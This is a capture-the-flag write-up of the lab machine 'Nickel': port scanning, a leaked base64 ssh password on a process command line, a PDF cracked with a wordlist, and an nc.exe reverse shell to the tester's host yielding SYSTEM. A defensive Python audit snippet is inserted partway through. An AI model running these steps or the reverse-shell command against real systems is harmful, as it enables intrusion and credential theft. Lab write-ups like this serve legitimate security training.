Nickel
Network
- IP Target: 192.168.154.99
Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
| 21/tcp | ftp | FileZilla ftpd | FTP |
| 22/tcp | ssh | OpenSSH for_Windows_8.1 | SSH |
| 80/tcp | http | - | |
| 135/tcp | msrpc | Microsoft Windows RPC | MSRPC |
| 139/tcp | netbios-ssn | Microsoft Windows netbios-ssn | SMB |
| 445/tcp | microsoft-ds | - | SMB |
| 3389/tcp | ms-wbt-server | Microsoft Terminal Services | RDP |
| 5040/tcp | unknown | - | |
| 7680/tcp | pando-pub | - | |
| 8089/tcp | unknown | Microsoft HTTPAPI | |
| 33333/tcp | dgi-serv | - | |
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.154.99
[sudo] password for momphucker:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 14:28 CET
Nmap scan report for 192.168.154.99
Host is up (0.068s latency).
Not shown: 65428 closed tcp ports (reset), 90 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5040/tcp open unknown
7680/tcp open pando-pub
8089/tcp open unknown
33333/tcp open dgi-serv
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 111.68 seconds
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo nmap -Pn -sC -sV -p21,22,80,135,139,445,3389,5040,7680,8089,3333 -oN alltcp.txt 192.168.154.99
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 14:37 CET
Nmap scan report for 192.168.154.99
Host is up (0.071s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
22/tcp open ssh OpenSSH for_Windows_8.1 (protocol 2.0)
| ssh-hostkey:
| 3072 86:84:fd:d5:43:27:05:cf:a7:f2:e9:e2:75:70:d5:f3 (RSA)
| 256 9c:93:cf:48:a9:4e:70:f4:60:de:e1:a9:c2:c0:b6:ff (ECDSA)
|_ 256 00:4e:d7:3b:0f:9f:e3:74:4d:04:99:0b:b1:8b:de:a5 (ED25519)
80/tcp closed http
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3333/tcp closed dec-notes
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=nickel
| Not valid before: 2024-08-01T20:35:07
|_Not valid after: 2025-01-31T20:35:07
| rdp-ntlm-info:
| Target_Name: NICKEL
| NetBIOS_Domain_Name: NICKEL
| NetBIOS_Computer_Name: NICKEL
| DNS_Domain_Name: nickel
| DNS_Computer_Name: nickel
| Product_Version: 10.0.18362
|_ System_Time: 2024-12-23T13:39:47+00:00
|_ssl-date: 2024-12-23T13:40:53+00:00; 0s from scanner time.
5040/tcp open unknown
7680/tcp closed pando-pub
8089/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-23T13:39:48
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 227.31 seconds
Port 80
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo feroxbuster -u http://192.168.154.99 -w /usr/share/dirb/wordlists/big.txt -t 50
[sudo] password for momphucker:
Sorry, try again.
[sudo] password for momphucker:
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.154.99
🚀 Threads │ 50
📖 Wordlist │ /usr/share/dirb/wordlists/big.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 1l 3w 60c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 4l 7w 97c http://192.168.154.99/
200 GET 0l 0w 0c http://192.168.154.99/Download
200 GET 0l 0w 0c http://192.168.154.99/Log
200 GET 0l 0w 0c http://192.168.154.99/download
200 GET 0l 0w 0c http://192.168.154.99/exit
[####################] - 34s 20469/20469 0s found:5 errors:13197
[####################] - 34s 20469/20469 609/s http://192.168.154.99/
Port 8089
The page served on port 8089 links to three endpoints, all pointing at 169.254.127.78:33333:
- List Current Deployments: http://169.254.127.78:33333/list-current-deployments?
- List Running Processes: http://169.254.127.78:33333/list-running-procs?
- List Active Nodes: http://169.254.127.78:33333/list-active-nodes?
Port 33333
Exploit
The links point to 169.254.127.78, a link-local address that looks like it was self-assigned because of a DHCP problem. Since they target port 33333, which is open on the target, I suspect it is the same machine as 192.168.154.99, so I try substituting the IP in the links:
| Name | Old Path | New Path |
|---|---|---|
| List Current Deployments | http://169.254.127.78:33333/list-current-deployments? | http://192.168.154.99:33333/list-current-deployments? |
| List Running Processes | http://169.254.127.78:33333/list-running-procs? | http://192.168.154.99:33333/list-running-procs? |
| List Active Nodes | http://169.254.127.78:33333/list-active-nodes? | http://192.168.154.99:33333/list-active-nodes? |
And indeed there is a response. Calling it with curl I get:
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl 'http://192.168.154.99:33333/list-active-nodes' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1'
<p>Cannot "GET" /list-active-nodes</p>
This indicates that a GET is not accepted, so I try a POST:
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl -X POST 'http://192.168.154.99:33333/list-active-nodes' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Length Required</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Length Required</h2>
<hr><p>HTTP Error 411. The request must be chunked or have a content length.</p>
</BODY></HTML>
The error says the request must either be chunked or carry a Content-Length header, so I add Content-Length: 0:
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl -X POST 'http://192.168.154.99:33333/list-active-nodes' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' -H 'Content-Length: 0' --verbose
* Trying 192.168.154.99:33333...
* Connected to 192.168.154.99 (192.168.154.99) port 33333
> POST /list-active-nodes HTTP/1.1
> Host: 192.168.154.99:33333
> User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> DNT: 1
> Connection: keep-alive
> Referer: http://192.168.154.99:8089/
> Upgrade-Insecure-Requests: 1
> Sec-GPC: 1
> Content-Length: 0
>
< HTTP/1.1 200 OK
< Content-Length: 22
< Server: Microsoft-HTTPAPI/2.0
< Date: Mon, 23 Dec 2024 14:48:48 GMT
<
* Connection #0 to host 192.168.154.99 left intact
<p>Not Implemented</p>
The first URL only returns "Not Implemented", so I try the second:
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ curl -X POST 'http://192.168.154.99:33333/list-running-procs' -H 'User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://192.168.154.99:8089/' -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-GPC: 1' -H 'Content-Length: 0' --verbose
* Trying 192.168.154.99:33333...
* Connected to 192.168.154.99 (192.168.154.99) port 33333
> POST /list-running-procs HTTP/1.1
> Host: 192.168.154.99:33333
> User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/115.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
> Accept-Language: en-US,en;q=0.5
> Accept-Encoding: gzip, deflate
> DNT: 1
> Connection: keep-alive
> Referer: http://192.168.154.99:8089/
> Upgrade-Insecure-Requests: 1
> Sec-GPC: 1
> Content-Length: 0
>
< HTTP/1.1 200 OK
< Content-Length: 3650
< Server: Microsoft-HTTPAPI/2.0
< Date: Mon, 23 Dec 2024 14:49:33 GMT
<
[...]
name : cmd.exe
commandline : cmd.exe C:\windows\system32\DevTasks.exe --deploy C:\work\dev.yaml --user ariah -p
"Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
[...]
* Connection #0 to host 192.168.154.99 left intact
I get a list of processes, including one for an ssh session with username ariah and password Tm93aXNlU2xvb3BUaGVvcnkxMzkK passed on the command line. Since port 22 is open I try logging in over ssh with it, without success. The password looks base64-encoded, so I decode it:
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ hURL -b "Tm93aXNlU2xvb3BUaGVvcnkxMzkK"
Original string :: Tm93aXNlU2xvb3BUaGVvcnkxMzkK
base64 DEcoded string :: NowiseSloopTheory139
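As an added audit check (not part of the original write-up), the following Python parses a listing in the shape of the list-running-procs output above and flags command lines that pass a secret through a password flag, decoding base64-looking values so an analyst can see that the credential is effectively cleartext. The flag list and the sample listing are constructed assumptions; only the DevTasks.exe line mirrors what was seen on the target.

```python
import base64
import re

# Constructed sample in the shape of the list-running-procs output above;
# the DevTasks.exe line mirrors the one seen on the target, the rest is made up.
SAMPLE_PROCS = """\
name : svchost.exe
commandline : C:\\Windows\\system32\\svchost.exe -k netsvcs
name : cmd.exe
commandline : cmd.exe C:\\windows\\system32\\DevTasks.exe --deploy C:\\work\\dev.yaml --user ariah -p "Tm93aXNlU2xvb3BUaGVvcnkxMzkK" --server nickel-dev --protocol ssh
name : notepad.exe
commandline : notepad.exe C:\\work\\notes.txt
"""

# Flags that usually carry a secret on a command line (assumed list; extend for your estate).
SECRET_FLAGS = re.compile(r'(?:^|\s)(-p|-pw|--password|--pass|/p)\s+"?([^\s"]+)"?', re.IGNORECASE)
B64_SHAPE = re.compile(r'^[A-Za-z0-9+/]{8,}={0,2}$')


def parse_procs(text):
    """Pair each 'name :' line with the 'commandline :' line that follows it."""
    procs, name = [], None
    for line in text.splitlines():
        key, _, value = line.partition(':')  # split on the first colon only; paths keep theirs
        key, value = key.strip().lower(), value.strip()
        if key == 'name':
            name = value
        elif key == 'commandline' and name is not None:
            procs.append((name, value))
            name = None
    return procs


def try_base64(value):
    """Return the decoded text if value is strict base64, else None."""
    if not B64_SHAPE.match(value):
        return None
    try:
        return base64.b64decode(value, validate=True).decode('utf-8', 'replace').strip()
    except ValueError:  # binascii.Error is a ValueError
        return None


def find_exposed_secrets(text):
    """Flag every process whose command line passes a secret via a known flag."""
    findings = []
    for name, cmdline in parse_procs(text):
        for m in SECRET_FLAGS.finditer(cmdline):
            flag, value = m.group(1), m.group(2)
            findings.append({'process': name, 'flag': flag, 'value': value,
                             'decoded': try_base64(value)})
    return findings
```

The same check can be pointed at a `tasklist`/`Get-Process` command-line export or an EDR process-creation feed; any hit means the secret is visible to every local user that can read process command lines.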
I try ssh access with username ariah and password NowiseSloopTheory139:
┌──(momphucker㉿kali-vmw-warmachine)-[~]
└─$ ssh -l ariah 192.168.154.99
ariah@192.168.154.99's password:
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
ariah@NICKEL C:\Users\ariah>
Success!
I retrieve the local.txt flag:
Privilege Escalation
The FTP folder contains a PDF, Infrastructure.pdf. I download it, but opening it requires a password:
I try cracking it with pdfcrack:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ sudo pdfcrack -f Infrastructure.pdf -w /usr/share/wordlists/rockyou.txt
PDF version 1.7
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 14350d814f7c974db9234e3e719e360b
U: 6aa1a24681b93038947f76796470dbb100000000000000000000000000000000
O: d9363dc61ac080ac4b9dad4f036888567a2d468a6703faf6216af1eb307921b0
Average Speed: 119673.4 w/s. Current Word: '097270613'
Average Speed: 119564.6 w/s. Current Word: 'pass0577'
Average Speed: 119661.3 w/s. Current Word: 'jamz01'
Average Speed: 119240.1 w/s. Current Word: 'blv99f250'
found user-password: 'ariah4168'
Success, the password is ariah4168!
Contents of the PDF:
The first link is a command endpoint. I test it:
The commands run as SYSTEM.
At this point I open a listener on port 4455:
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
I upload nc.exe to the machine, since it is not present, and trigger a reverse shell through the web command endpoint:
nickel/?C:\Users\ariah\Desktop\nc.exe 192.168.45.172 4455 -e cmd
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Nickel]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.172] from (UNKNOWN) [192.168.154.99] 49709
Microsoft Windows [Version 10.0.18362.1016]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system